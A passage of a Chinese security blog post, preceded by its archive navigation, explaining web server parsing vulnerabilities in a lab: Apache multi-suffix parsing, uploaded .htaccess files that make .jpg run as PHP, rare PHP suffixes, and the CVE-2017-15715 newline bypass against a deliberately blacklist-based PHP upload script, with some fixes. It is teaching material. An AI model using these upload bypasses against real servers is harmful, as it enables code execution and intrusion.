data-tag=Hexo,Hexo性能优化 data-author><span class=post-title title=Hexo速度优化及遇到的问题(gulp4、hexo-neat)>Hexo速度优化及遇到的问题(gulp4、hexo-neat)</span> <span class=post-date title="2020-02-08 00:24:25">2020/02/08</span></a> <a class="全部文章 编程开发 Python" href="/2020/01/21/Python学习-基础篇(四)/" data-tag=异常处理及程序调试,文件及目录操作,操作数据库 data-author><span class=post-title title=Python学习-基础篇(四)>Python学习-基础篇(四)</span> <span class=post-date title="2020-01-21 21:31:15">2020/01/21</span></a> <a class="全部文章 编程开发 Python" href="/2020/01/19/Python学习-基础篇(三)/" data-tag=字符串及正则表达式,函数,模块 data-author><span class=post-title title=Python学习-基础篇(三)>Python学习-基础篇(三)</span> <span class=post-date title="2020-01-19 18:16:50">2020/01/19</span></a> <a class="全部文章 编程开发 Python" href="/2020/01/18/Python学习-基础篇(二)/" data-tag=序列的应用,列表,元组,字典,集合 data-author><span class=post-title title=Python学习-基础篇(二)>Python学习-基础篇(二)</span> <span class=post-date title="2020-01-18 20:01:31">2020/01/18</span></a> <a class="全部文章 编程开发 Python" href="/2020/01/16/Python学习-基础篇(一)/" data-tag=开发工具,基本语法,流程控制 data-author><span class=post-title title=Python学习-基础篇(一)>Python学习-基础篇(一)</span> <span class=post-date title="2020-01-16 22:29:30">2020/01/16</span></a> <a class="全部文章 运维 Linux基础" href="/2020/01/07/Linux虚拟机常见使用及常见问题/" data-tag=Linux,问题整理 data-author><span class=post-title title=Linux虚拟机常见使用及常见问题>Linux虚拟机常见使用及常见问题</span> <span class=post-date title="2020-01-07 16:08:02">2020/01/07</span></a> <a class="全部文章 复习" href="/2019/12/26/Linux基础期末整理复习/" data-tag=Linux,期末复习 data-author><span class=post-title title=Linux基础期末整理复习>Linux基础期末整理复习</span> <span class=post-date title="2019-12-26 16:50:43">2019/12/26</span></a> <a class="全部文章 线下赛 AWD" href="/2019/12/16/AWD模式总结与2019河南高校网安联赛复现/" data-tag=河南高校网安联赛,复现 data-author><span class=post-title title=AWD模式总结与2019河南高校网安联赛复现>AWD模式总结与2019河南高校网安联赛复现</span> <span class=post-date title="2019-12-16 22:58:25">2019/12/16</span></a> <a class="全部文章 漏洞原理 XXE漏洞" href="/2019/12/02/从XML相关一步一步到XXE漏洞/" data-tag=XML,XML注入,Xpath注入,XXE漏洞 data-author><span class=post-title title=从XML相关一步一步到XXE漏洞>从XML相关一步一步到XXE漏洞</span> <span class=post-date title="2019-12-02 14:47:00">2019/12/02</span></a> <a class="全部文章 漏洞原理 SQL注入" href="/2019/11/16/sqli-labs攻关5(Sta)(Less-39_Less-53)/" data-tag="题目复现,靶场练习,堆叠注入,order by排序注入,异或注入" data-author><span class=post-title title=sqli-labs攻关5(Sta)(Less-39_Less-53)>sqli-labs攻关5(Sta)(Less-39_Less-53)</span> <span class=post-date title="2019-11-16 23:58:43">2019/11/16</span></a> <a class="全部文章 漏洞原理 SQL注入" href="/2019/11/12/sqli-labs攻关4(Adv)(Less-23_Less-38)/" data-tag=靶场练习,二次注入,过滤敏感关键字与WAF绕过,宽字节注入 data-author><span class=post-title title=sqli-labs攻关4(Adv)(Less-23_Less-38)>sqli-labs攻关4(Adv)(Less-23_Less-38)</span> <span class=post-date title="2019-11-12 23:02:46">2019/11/12</span></a> <a class="全部文章 漏洞原理 SQL注入" href="/2019/11/06/sqli-labs攻关3(Less-11-Less-22)/" data-tag=靶场练习,POST型联合查询注入,POST型报错注入,POST型盲注 data-author><span class=post-title title=sqli-labs攻关3(Less-11_Less-22)>sqli-labs攻关3(Less-11_Less-22)</span> <span class=post-date title="2019-11-06 23:55:21">2019/11/06</span></a> <a class="全部文章 漏洞原理 协议层漏洞" href="/2019/10/27/从一道题到HTTP请求走私/" data-tag=题目复现,HTTP,HTTP请求走私 data-author><span class=post-title title=从一道题到HTTP请求走私>从一道题到HTTP请求走私</span> <span class=post-date title="2019-10-27 23:13:44">2019/10/27</span></a> <a class="全部文章 漏洞原理 SQL注入" href="/2019/10/26/SQL盲注的简单分析/" data-tag=SQL盲注 data-author><span class=post-title title=SQL盲注的简单分析>SQL盲注的简单分析</span> <span class=post-date title="2019-10-26 21:50:20">2019/10/26</span></a> <a class="全部文章 漏洞原理 文件操作漏洞" href="/2019/10/19/任意文件读取与下载漏洞/" data-tag=题目复现,任意文件读取漏洞,任意文件下载漏洞 data-author><span class=post-title title=任意文件读取与下载漏洞>任意文件读取与下载漏洞</span> <span class=post-date title="2019-10-19 01:01:11">2019/10/19</span></a> <a class="全部文章 漏洞原理 SQL注入" href="/2019/09/25/SQL注入-报错注入/" data-tag=报错注入 data-author><span class=post-title title=SQL注入-报错注入>SQL注入-报错注入</span> <span class=post-date title="2019-09-25 00:21:26">2019/09/25</span></a> <a class="全部文章 CTF" href="/2019/09/05/攻防世界-Web(进阶区)/" data-tag=CTF,Web,攻防世界 data-author><span class=post-title title=攻防世界-Web(进阶区)>攻防世界-Web(进阶区)</span> <span class=post-date title="2019-09-05 23:46:17">2019/09/05</span></a> <a class="全部文章 CTF" href="/2019/09/02/i春秋-Web(一)/" data-tag=CTF,Web,i春秋 data-author><span class=post-title title=i春秋-Web(一)>i春秋-Web(一)</span> <span class=post-date title="2019-09-02 20:41:21">2019/09/02</span></a> <a class="全部文章 CTF" href="/2019/08/25/南邮-Web(二)/" data-tag=CTF,Web,南邮 data-author><span class=post-title title=南邮-Web(二)>南邮-Web(二)</span> <span class=post-date title="2019-08-25 18:31:58">2019/08/25</span></a> <a class="全部文章 漏洞原理 文件包含漏洞" href="/2019/08/21/文件包含漏洞/" data-tag=漏洞利用,漏洞基础,漏洞绕过,PHP伪协议 data-author><span class=post-title title=文件包含漏洞>文件包含漏洞</span> <span class=post-date title="2019-08-21 21:28:09">2019/08/21</span></a> <a class="全部文章 漏洞原理 信息泄露" href="/2019/08/15/常见Web源码泄露/" data-tag=源码泄露,源码泄露类型 data-author><span class=post-title title=常见Web源码泄露>常见Web源码泄露</span> <span class=post-date title="2019-08-15 20:03:10">2019/08/15</span></a> <a class="全部文章 漏洞原理 反序列化漏洞" href="/2019/08/14/PHP反序列化漏洞/" data-tag=PHP类与对象,序列化与反序列化基础,魔术方法简单利用 data-author><span class=post-title title=PHP反序列化漏洞>PHP反序列化漏洞</span> <span class=post-date title="2019-08-14 23:29:51">2019/08/14</span></a> <a class="全部文章 漏洞原理 命令注入" href="/2019/08/08/命令执行(Command Injection)与代码执行(Code execution)/" data-tag=命令执行,代码执行 data-author><span class=post-title title="命令执行(Command Injection)与代码执行(Code execution)">命令执行(Command Injection)与代码执行(Code execution)</span> <span class=post-date title="2019-08-08 23:11:51">2019/08/08</span></a> <a class="全部文章 CTF" href="/2019/08/06/Crypto-RSA加密/" data-tag=CTF,Crypto,RSA data-author><span class=post-title title=Crypto-RSA加密>Crypto-RSA加密</span> <span class=post-date title="2019-08-06 23:16:34">2019/08/06</span></a> <a class="全部文章 漏洞原理 文件上传漏洞" href="/2019/08/03/文件上传漏洞 学习笔记(二)/" data-tag=白名单绕过,内容绕过,竞争条件绕过 data-author><span class=post-title title="文件上传漏洞 学习笔记(二)">文件上传漏洞 学习笔记(二)</span> <span class=post-date title="2019-08-03 10:22:22">2019/08/03</span></a> <a class="全部文章 CTF" href="/2019/08/02/CTF做题总结(二)/" data-tag=Web,Reverse,SQL,盲注 data-author><span class=post-title title=CTF做题总结(二)>CTF做题总结(二)</span> <span class=post-date title="2019-08-02 11:22:58">2019/08/02</span></a> <a class="全部文章 漏洞原理 文件上传漏洞" href="/2019/07/31/文件上传漏洞 学习笔记(一)/" data-tag=JS绕过,MIME绕过,黑名单绕过 data-author><span class=post-title title="文件上传漏洞 学习笔记(一)">文件上传漏洞 学习笔记(一)</span> <span class=post-date title="2019-07-31 23:01:05">2019/07/31</span></a> <a class="全部文章 CTF" href="/2019/07/25/南邮-Web(一)/" data-tag=CTF,Web,南邮 data-author><span class=post-title title=南邮-Web(一)>南邮-Web(一)</span> <span class=post-date title="2019-07-25 20:05:46">2019/07/25</span></a> <a class="全部文章 CTF" href="/2019/07/21/Crypto-简单加密/" data-tag=CTF,Crypto,简单加密 data-author><span class=post-title title=Crypto-简单加密>Crypto-简单加密</span> <span class=post-date title="2019-07-21 21:30:41">2019/07/21</span></a> <a class="全部文章 漏洞原理 SQL注入" href="/2019/07/19/sqli-labs攻关2(Less-7_Less-10)/" data-tag=靶场练习,导出文件注入,GET型盲注 data-author><span class=post-title title=sqli-labs攻关2(Less-7_Less-10)>sqli-labs攻关2(Less-7_Less-10)</span> <span class=post-date title="2019-07-19 22:05:21">2019/07/19</span></a> <a class="全部文章 CTF" href="/2019/07/17/攻防世界-Web(新手区)/" data-tag=CTF,Web,攻防世界 data-author><span class=post-title title=攻防世界-Web(新手区)>攻防世界-Web(新手区)</span> <span class=post-date title="2019-07-17 21:22:27">2019/07/17</span></a> <a class="全部文章 CTF" href="/2019/07/15/安恒月赛7月-MISC wp/" data-tag=CTF,MISC,安恒 data-author><span class=post-title title="安恒月赛7月-MISC wp">安恒月赛7月-MISC wp</span> <span class=post-date title="2019-07-15 19:33:17">2019/07/15</span></a> <a class="全部文章 漏洞原理 XSS" href="/2019/07/14/XSS漏洞攻关(二)/" data-tag=XSS绕过 data-author><span class=post-title title=XSS漏洞攻关(二)>XSS漏洞攻关(二)</span> <span class=post-date title="2019-07-14 19:01:42">2019/07/14</span></a> <a class="全部文章 CTF" href="/2019/07/12/Crypto-位移编码/" data-tag=CTF,Crypto,移位编码 data-author><span class=post-title title=Crypto-位移编码>Crypto-位移编码</span> <span class=post-date title="2019-07-12 21:32:41">2019/07/12</span></a> <a class="全部文章 CTF" href="/2019/07/10/MISC-图片隐写/" data-tag=CTF,MISC,隐写 data-author><span class=post-title title=MISC-图片隐写>MISC-图片隐写</span> <span class=post-date title="2019-07-10 21:05:43">2019/07/10</span></a> <a class="全部文章 线下赛 AWD" href="/2019/06/24/ISCC2019线下赛总结/" data-tag=ISCC,感悟 data-author><span class=post-title title=ISCC2019线下赛总结>ISCC2019线下赛总结</span> <span class=post-date title="2019-06-24 00:07:01">2019/06/24</span></a> <a class="全部文章 线下赛 AWD" href="/2019/06/19/CTF线下赛AWD攻防准备/" data-tag=准备 data-author><span class=post-title title=CTF线下赛AWD攻防准备>CTF线下赛AWD攻防准备</span> <span class=post-date title="2019-06-19 19:45:58">2019/06/19</span></a> <a class="全部文章 CTF" href="/2019/06/18/BUGKU做题总结(一)/" data-tag=CTF,BUGKU,MISC data-author><span class=post-title title=BUGKU做题总结(一)>BUGKU做题总结(一)</span> <span class=post-date title="2019-06-18 21:11:11">2019/06/18</span></a> <a class="全部文章 漏洞原理 SQL注入" href="/2019/06/10/sqli-labs攻关1(Less-1_Less-6)/" data-tag=GET型联合查询注入,GET型双查询注入,靶场练习 data-author><span class=post-title title=sqli-labs攻关1(Less-1_Less-6)>sqli-labs攻关1(Less-1_Less-6)</span> <span class=post-date title="2019-06-10 19:03:52">2019/06/10</span></a> <a class="全部文章 编程开发 PHP" href="/2019/06/05/Web开发-简单BBS论坛/" data-tag=Web开发,bbs论坛 data-author><span class=post-title title=Web开发-简单BBS论坛>Web开发-简单BBS论坛</span> <span class=post-date title="2019-06-05 17:32:32">2019/06/05</span></a> <a class="全部文章 协议分析 HTTP协议" href="/2019/05/29/HTTP协议基础/" data-tag=HTTP协议,HTTP头流量包 data-author><span class=post-title title=HTTP协议基础>HTTP协议基础</span> <span class=post-date title="2019-05-29 20:39:42">2019/05/29</span></a> <a class="全部文章 CTF" href="/2019/05/27/ISCC-MISC做题总结/" data-tag=CTF,MISC,ISCC data-author><span class=post-title title=ISCC-MISC做题总结>ISCC-MISC做题总结</span> <span class=post-date title="2019-05-27 18:53:14">2019/05/27</span></a> <a class="全部文章 编程开发 PHP" href="/2019/05/04/Web开发-PHP基础篇(四)/" data-tag=MySQL学习,PHP与MySQL交互 data-author><span class=post-title title=Web开发-PHP基础篇(四)>Web开发-PHP基础篇(四)</span> <span class=post-date title="2019-05-04 15:18:37">2019/05/04</span></a> <a class="全部文章 漏洞原理 XSS" href="/2019/04/28/XSS漏洞攻关(一)/" data-tag=XSS基础,XSS绕过 data-author><span class=post-title title=XSS漏洞攻关(一)>XSS漏洞攻关(一)</span> <span class=post-date title="2019-04-28 17:00:44">2019/04/28</span></a> <a class="全部文章 编程开发 PHP" href="/2019/04/27/Web开发-PHP基础篇(三)/" data-tag=正则表达式,日期和时间,图像处理,文件与目录操作,会话控制 data-author><span class=post-title title=Web开发-PHP基础篇(三)>Web开发-PHP基础篇(三)</span> <span class=post-date title="2019-04-27 15:02:06">2019/04/27</span></a> <a class="全部文章 线下赛 团队内部" href="/2019/04/26/一次团队内部比赛经历/" data-tag=BUG,SQL注入,PHP data-author><span class=post-title title=一次团队内部比赛经历>一次团队内部比赛经历</span> <span class=post-date title="2019-04-26 22:59:01">2019/04/26</span></a> <a class="全部文章 编程开发 PHP" href="/2019/04/26/php mysql html css制作带Cookie登陆页面/" data-tag=Web开发,登录和注册功能 data-author><span class=post-title title="php mysql html css制作带Cookie登陆页面">php mysql html css制作带Cookie登陆页面</span> <span class=post-date title="2019-04-26 10:08:26">2019/04/26</span></a> <a class="全部文章 CTF" href="/2019/04/16/CTF做题总结(一)/" data-tag=CTF,MISC,Crypto data-author><span class=post-title title=CTF做题总结(一)>CTF做题总结(一)</span> <span class=post-date title="2019-04-16 11:27:05">2019/04/16</span></a> <a class="全部文章 编程开发 PHP" href="/2019/04/15/Web开发-PHP基础篇(一~二)/" data-tag=基本语法,流程控制,函数,数组,字符串 data-author><span class=post-title title=Web开发-PHP基础篇(一-二)>Web开发-PHP基础篇(一-二)</span> <span class=post-date title="2019-04-15 20:22:18">2019/04/15</span></a> <a class="全部文章 CTF" href="/2019/04/06/MISC-隐写的总结/" data-tag=CTF,MISC,隐写 data-author><span class=post-title title=MISC-隐写的总结>MISC-隐写的总结</span> <span class=post-date title="2019-04-06 18:33:32">2019/04/06</span></a> <a class="全部文章 CTF" href="/2019/04/06/MISC-zip压缩包的总结/" data-tag=CTF,MISC,ZIP data-author><span class=post-title title=MISC-zip压缩包的总结>MISC-zip压缩包的总结</span> <span class=post-date title="2019-04-06 00:21:56">2019/04/06</span></a> <a class="全部文章 编程开发 前端" href="/2019/03/30/Web前端-CSS篇/" data-tag=Web前端,CSS data-author><span class=post-title title=Web前端-CSS篇>Web前端-CSS篇</span> <span class=post-date title="2019-03-30 19:39:32">2019/03/30</span></a> <a class="全部文章 编程开发 前端" href="/2019/03/25/Web前端-HTML篇/" data-tag=Web前端,HTML data-author><span class=post-title title=Web前端-HTML篇>Web前端-HTML篇</span> <span class=post-date title="2019-03-25 22:54:31">2019/03/25</span></a> <a class="全部文章 博客" href="/2019/03/17/Github-Hexo的搭建/" data-tag=Hexo,Github,Hexo搭建 data-author><span class=post-title title=Github-Hexo简单搭建>Github-Hexo简单搭建</span> <span class=post-date title="2019-03-17 12:36:45">2019/03/17</span></a> <a class="全部文章 编程开发 前端" href="/2019/03/15/html基础篇一/" data-tag=Web前端,HTML data-author><span class=post-title title=超文本标记语言html>超文本标记语言html</span> <span class=post-date title="2019-03-15 23:43:10">2019/03/15</span></a> <a class="全部文章 工具学习 phpstudy" href="/2019/03/15/phpstudy-MySQL基础篇一/" data-tag=Web,数据库 data-author><span class=post-title title=phpstudy-MySQL的简单使用以及cmd打开MySQL>phpstudy-MySQL的简单使用以及cmd打开MySQL</span> <span class=post-date title="2019-03-15 23:39:20">2019/03/15</span></a> <a class="全部文章 First" href="/2019/03/12/hello-world/" data-tag data-author><span class=post-title title="Hello world">Hello world</span> <span class=post-date title="2019-03-12 22:33:11">2019/03/12</span></a><div id=no-item-tips></div></nav><div id=outline-list></div></div></div><div class=hide-list><div class=semicircle data-title="切换全屏 快捷键 s"><div class="brackets first"><</div><div class=brackets>&gt;</div></div></div></aside><div id=post><div class=pjax><article id=post-浅谈解析漏洞的利用与防范 class="article article-type-post" itemscope itemprop=blogPost><h1 class=article-title>浅谈解析漏洞的利用与防范</h1><div class=article-meta><span class=book><i class="iconfont icon-category"></i> <a data-rel=漏洞原理>漏洞原理</a> > <a data-rel=漏洞原理&lt;---&gt;解析漏洞>解析漏洞</a></span> <span class=tag><i class="iconfont icon-tag"></i> <a class=color1>Apache解析漏洞</a> <a class=color5>Nginx解析漏洞</a> <a class=color3>IIS解析漏洞</a></span></div><div class=article-meta>发布时间 :<time class=date title="最后更新: 2020-10-20 20:19:28">2020-10-20 19:23</time></div><div class=article-meta><span>字数:4.7k</span> <span id=busuanzi_container_page_pv>阅读 :<span id=busuanzi_value_page_pv><span class=count-comment><span class=spinner><div class=cube1></div><div class=cube2></div></span></span></span></span></div><div class=toc-ref><ol class=toc><li class="toc-item toc-level-3"><a class=toc-link href=#0x00-前言><span class=toc-text>0x00 前言</span></a></li><li class="toc-item toc-level-3"><a class=toc-link href=#0x01-解析漏洞简介><span class=toc-text>0x01 解析漏洞简介</span></a></li><li class="toc-item toc-level-3"><a class=toc-link href=#0x02-Apache><span class=toc-text>0x02 Apache</span></a><ol class=toc-child><li class="toc-item toc-level-4"><a class=toc-link href=#1、多后缀><span class=toc-text>1、多后缀</span></a></li><li class="toc-item toc-level-4"><a class=toc-link href=#2、Apache配置问题><span class=toc-text>2、Apache配置问题</span></a></li><li class="toc-item toc-level-4"><a class=toc-link href=#3、罕见后缀><span class=toc-text>3、罕见后缀</span></a></li><li class="toc-item toc-level-4"><a class=toc-link href=#4、后缀包含换行符-x0A-CVE-2017-15715><span class=toc-text>4、后缀包含换行符\x0A(CVE-2017-15715)</span></a></li></ol></li><li class="toc-item toc-level-3"><a class=toc-link href=#0x03-Nginx><span class=toc-text>0x03 Nginx</span></a><ol class=toc-child><li class="toc-item toc-level-4"><a class=toc-link href=#1、Nginx-PHP-CGI-解析漏洞-fix-pathinfo><span class=toc-text>1、Nginx PHP CGI 解析漏洞(fix_pathinfo)</span></a></li><li class="toc-item toc-level-4"><a class=toc-link href=#2、空字节代码执行漏洞><span class=toc-text>2、空字节代码执行漏洞</span></a></li><li class="toc-item toc-level-4"><a class=toc-link href=#3、nginx文件名逻辑漏洞-CVE-2013-4547><span class=toc-text>3、nginx文件名逻辑漏洞(CVE-2013-4547)</span></a></li></ol></li><li class="toc-item toc-level-3"><a class=toc-link href=#0x04-IIS><span class=toc-text>0x04 IIS</span></a><ol class=toc-child><li class="toc-item toc-level-4"><a class=toc-link href=#1、IIS-5-x和IIS-6-x解析漏洞><span class=toc-text>1、IIS 5.x和IIS 6.x解析漏洞</span></a><ol class=toc-child><li class="toc-item toc-level-5"><a class=toc-link href=#1-目录解析-6-0><span class=toc-text>1.目录解析(6.0)</span></a></li><li class="toc-item toc-level-5"><a class=toc-link href=#2-文件解析-6-0><span class=toc-text>2.文件解析(6.0)</span></a></li><li class="toc-item toc-level-5"><a class=toc-link href=#3-解析文件类型-默认解析后缀><span class=toc-text>3.解析文件类型(默认解析后缀)</span></a></li></ol></li><li class="toc-item toc-level-4"><a class=toc-link href=#2、IIS-7-0-7-5-CGI解析漏洞><span class=toc-text>2、IIS 7.0/7.5 CGI解析漏洞</span></a></li></ol></li><li class="toc-item toc-level-3"><a class=toc-link href=#0x05-user-ini><span class=toc-text>0x05 .user.ini</span></a></li><li class="toc-item toc-level-3"><a class=toc-link href=#0x06-Windows操作系统文件命名规则><span class=toc-text>0x06 Windows操作系统文件命名规则</span></a></li></ol><style>
    .left-col .switch-btn,
    .left-col .switch-area {
        display: none;
    }
    .toc-level-5 i,
    .toc-level-5 ol {
        display: none !important;
    }
</style></div><div class=article-entry itemprop=articleBody><p><strong>本文首发于安全客，如果方便的话请阅读原文</strong>：<br><strong><a href=https://www.anquanke.com/post/id/219107 target=_blank rel=noopener>https://www.anquanke.com/post/id/219107</a></strong></p><h3 id=0x00-前言><a href=#0x00-前言 class=headerlink title="0x00 前言"></a>0x00 前言</h3><p>继续学习常见漏洞，经常听说过解析漏洞，这次来一探究竟。</p><h3 id=0x01-解析漏洞简介><a href=#0x01-解析漏洞简介 class=headerlink title="0x01 解析漏洞简介"></a>0x01 解析漏洞简介</h3><p><strong>1、文件解析漏洞概述</strong><br>文件解析漏洞,是指Web容器（Apache、Nginx、IIS等）在解析文件时将文件解析成脚本文件格式并得以执行而产生的漏洞。从而,黑客可以利用该漏洞实现非法文件的解析。<br><strong>2、web容器是什么</strong><br>web容器是一种服务程序，在服务器一个端口就有一个提供相应服务的程序，而这个程序就是处理从客户端发出的请求，如tomcat、apache、nginx等。(可以理解为编程语言提供环境)</p><p><strong>中间件</strong>：提供系统软件和应用软件之间连接的软件，以便于软件各部件之间的沟通。中间件处在操作系统和更高一级应用程序之间。<br><strong>容器</strong>：给处于其中的应用程序组件(ASP,JSP,PHP)提供一个环境。使处于其中的应用程序组件之间跟容器中的环境变量接口交互，不必关注其他系统问题。<br><img src="https://img-blog.csdnimg.cn/20201006204254227.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_cXd6Zg==,size_16,color_FFFFFF,t_70" alt=在这里插入图片描述><br><strong>攻击者在利用上传漏洞时，通常会与Web容器的解析漏洞配合在一起</strong></p><h3 id=0x02-Apache><a href=#0x02-Apache class=headerlink title="0x02 Apache"></a>0x02 Apache</h3><p><strong>测试环境</strong><br>docker容器：kstaken/apache2<br>在docker里安装php：<code>apt-get update &amp;&amp; apt-get install php5</code><br>靶场：DoraBox靶场<br>修改站点根目录：<code>vim /etc/apache2/sites-enabled/000-default</code></p><h4 id=1、多后缀><a href=#1、多后缀 class=headerlink title=1、多后缀></a>1、多后缀</h4><p><strong>漏洞描述</strong>：<br>在Apache 2.0.x &lt;= 2.0.59，Apache 2.2.x &lt;= 2.2.17，Apache 2.2.2 &lt;= 2.2.8中Apache 解析文件的规则是从右到左开始判断解析,如果后缀名为不可识别文件解析,就再往左判断。<br>所以可上传一个<code>test.php.qwzf</code>文件绕过验证且服务器依然会将其解析为php。<br>Apache 能够识别的文件在<code>mime.types</code>文件里。<br><strong>影响版本</strong>：<br>Apache 2.0.x &lt;= 2.0.59<br>Apache 2.2.x &lt;= 2.2.17<br>Apache 2.2.2 &lt;= 2.2.8<br><strong>开始测试</strong>：<br>1.查看Apache版本：</p><pre><code class=bash>apachectl -v
#或httpd -v(测试未显示Apache版本)</code></pre><p><img src=https://img-blog.csdnimg.cn/20200930090726194.png><br>平时可以使用浏览器捕获的响应包或使用burp抓包查看apache版本。<br><img src=https://img-blog.csdnimg.cn/20200930093542497.png alt=在这里插入图片描述></p><p>2.在DoraBox的任意文件靶场进行测试<br>上传的文件名：test.php.qwzf<br>上传的文件内容</p><pre><code class=php>&lt;?php phpinfo(); ?&gt;</code></pre><p>上传成功，访问看一下<br><img src="https://img-blog.csdnimg.cn/20200930093207967.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_cXd6Zg==,size_16,color_FFFFFF,t_70" alt=在这里插入图片描述><br>成功解析成php文件。<br><strong>修复方法</strong>：<br>后缀验证尽量使用白名单的方式，这样即使使用不存在的后缀名，也无法绕过。</p><h4 id=2、Apache配置问题><a href=#2、Apache配置问题 class=headerlink title=2、Apache配置问题></a>2、Apache配置问题</h4><p>1.如果在Apache的 <code>/etc/apache2/apache2.conf</code>里有这样的配置</p><pre><code class=bash>&lt;FilesMatch &quot;qwzf.jpg&quot;&gt;
  SetHandler application/x-httpd-php
&lt;/FilesMatch&gt;</code></pre><p>这时只要文件名是<code>qwzf.jpg</code>，会以php 来执行。<br>2.如果在Apache的 conf 里有这样一行配置<code>AddHandler php5-script .php</code> 这时只要文件名里包含<code>.php</code><br>即使文件名是<code>qwzf.php.jpg</code>也会以php 来执行。<br>3.如果在 Apache 的 conf 里有这样一行配置<code>AddType application/x-httpd-php .jpg</code><br>即使扩展名是<code>.jpg</code>，也会以php来执行。</p><p>Apache提供了一种很方便的、可作用于当前目录及其子目录的配置文件——<code>.htaccess</code>(分布式配置文件)<br>将Apache的<code>/etc/apache2/sites-available/default</code>里<code>AllowOverride None</code>改为<code>AllowOverride All</code></p><pre><code class=bash>AllowOverride All</code></pre><p>开启rewrite_mod</p><pre><code class=bash>a2enmod rewrite</code></pre><p>这样<code>.htaccess</code>文件就会生效。<br><strong>开始测试</strong>：<br>1.上传一个<code>.htaccess</code>文件，文件内容如下：</p><pre><code class=bash>方法1：
&lt;FilesMatch &quot;qwzf.jpg&quot;&gt;
  SetHandler application/x-httpd-php
&lt;/FilesMatch&gt;

方法2：
AddHandler php5-script .php

方法3：
AddType application/x-httpd-php .jpg</code></pre><p>2.然后上传文件名为<br>方法1和方法3：qwzf.jpg<br>方法2和方法3：qwzf.php.jpg<br>文件内容为：<code>&lt;?php phpinfo(); ?&gt;</code><br><img src=https://img-blog.csdnimg.cn/20200930104104227.png alt=在这里插入图片描述><br><img src=https://img-blog.csdnimg.cn/20200930104420408.png alt=在这里插入图片描述><br><strong>修复方法</strong>：<br>1.apache配置文件，禁止<code>.php.</code>这样的文件执行，配置文件里面加入</p><pre><code class=bash>&lt;Files ~ “.(php.|php3.)”&gt;
        Order Allow,Deny
        Deny from all
&lt;/Files&gt;</code></pre><p>2.关闭重写</p><pre><code class=bash>a2dismod rewrite</code></pre><h4 id=3、罕见后缀><a href=#3、罕见后缀 class=headerlink title=3、罕见后缀></a>3、罕见后缀</h4><p>Apache配置文件中会有<code>.+.ph(p[345]?|t|tml)</code>此类的正则表达式，被当php程序执行的文件名要符合正则表达式。也就是说php3，php4，php5，pht，phtml等文件后缀也是可以被当作php文件进行解析的。<br>上传一个查看phpinfo信息的<code>qwzf.php3</code>文件，访问<br><img src=https://img-blog.csdnimg.cn/20200930112618670.png alt=在这里插入图片描述><br>发现<code>qwzf.php3</code>文件被当作php文件进行解析。</p><h4 id=4、后缀包含换行符-x0A-CVE-2017-15715><a href=#4、后缀包含换行符-x0A-CVE-2017-15715 class=headerlink title=4、后缀包含换行符\x0A(CVE-2017-15715)></a>4、后缀包含换行符\x0A(CVE-2017-15715)</h4><p>phith0n师傅在代码审计知识星球里提到了Apache的一个解析漏洞CVE-2017-15715<br><strong>漏洞描述</strong>：<br>上传一个后缀末尾包含换行符的文件，来绕过FilesMatch。绕过FilesMatch不一定能被PHP解析。<br>这个漏洞可以用来绕过文件上传黑名单限制。即：</p><blockquote><p>1.php\x0a =&gt; 1.php</p></blockquote><blockquote><p>apache通过mod_php来运行脚本，其2.4.0-2.4.29中存在apache换行解析漏洞，在解析php时xxx.php\x0A将被按照PHP后缀进行解析，导致绕过一些服务器的安全策略。该漏洞属于用户配置不当产生的漏洞，与具体中间件版本无关。</p></blockquote><p><strong>影响版本</strong>：<br>Apache 2.4.0-2.4.29<br><strong>测试环境</strong>：<br>1.环境一：<br>用docker拉取一个名为<code>vulhub/php:5.5-apache</code>的镜像(Apache版本2.4.0~2.4.29之间)<br>使用下面命令启动容器：</p><pre><code class=bash>docker run -d --name=cve-2017-15715 -p 8005:80 -v /var/www/bachang/cve-2017-15715:/var/www/html vulhub/php:5.5-apache</code></pre><p>进入容器并查看Apache版本</p><pre><code class=bash>docker exec -it cve-2017-15715 /bin/bash
apachectl -v</code></pre><p><img src=https://img-blog.csdnimg.cn/20201003002612771.png alt=在这里插入图片描述><br>将下面<strong>测试代码</strong>目录映射到容器内的/var/www/html目录下，设置好写权限，即可开始测试。</p><p>2.环境二：<br>当然，如果感觉自己搭环境比较麻烦，可以使用vulhub靶场的<code>CVE-2017-15715</code>环境。<br>环境位置：<code>vulhub/httpd/CVE-2017-15715</code><br><strong>测试代码</strong>：</p><pre><code class=php>&lt;html&gt;
&lt;body&gt;
  &lt;form action=&quot;&quot; method=&quot;post&quot; enctype=&quot;multipart/form-data&quot;&gt;
    file:&lt;input type=&quot;file&quot; name=&quot;file&quot;&gt;&lt;br /&gt;
    filename:&lt;input type=&quot;text&quot; name=&quot;name&quot; value=&quot;qwzf.php&quot;&gt;
    &lt;input type=&quot;submit&quot; value=&quot;submit&quot;&gt;
    &lt;/form&gt;
&lt;/body&gt;
&lt;/html&gt;
&lt;?php
if (isset($_FILES[&#39;file&#39;])) {
  $name = basename($_POST[&#39;name&#39;]);
  $ext = pathinfo($name, PATHINFO_EXTENSION);
  if (in_array($ext, [&#39;php&#39;, &#39;php3&#39;, &#39;php4&#39;, &#39;php5&#39;, &#39;phtml&#39;, &#39;pht&#39;])) {
    exit(&#39;bad file&#39;);
  }
  move_uploaded_file($_FILES[&#39;file&#39;][&#39;tmp_name&#39;], &#39;./&#39; . $name);
}
?&gt;</code></pre><p><strong>开始测试</strong>：<br>1.正常上传php文件，被拦截<br><img src=https://img-blog.csdnimg.cn/20201002233307512.png alt=在这里插入图片描述><br>2.上传<code>test.php.qwzf</code>，上传成功，但不解析，说明老的多后缀Apache解析漏洞不存在。<br><img src=https://img-blog.csdnimg.cn/20201002233452801.png alt=在这里插入图片描述><br>3.利用CVE-2017-15715，上传一个包含换行符的文件</p><blockquote><p>注：只能是\x0A，不能是\x0D\x0A</p></blockquote><p>上传<code>qwzf.php</code>文件，filename设置为<code>qwzf.php</code><br>使用burp抓包，选择burp的Hex功能，在<code>qwzf.php</code>后面添加一个<code>\x0A</code><br><img src="https://img-blog.csdnimg.cn/20201003003122740.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_cXd6Zg==,size_16,color_FFFFFF,t_70" alt=在这里插入图片描述><br>发包，上传成功。然后访问<code>qwzf.php%0A</code>，发现可以成功解析php文件<br><img src="https://img-blog.csdnimg.cn/20201003003230427.png?x-oss-process=image/watermark,type_ZmFuZ3poZW5naGVpdGk,shadow_10,text_cXd6Zg==,size_16,color_FFFFFF,t_70" 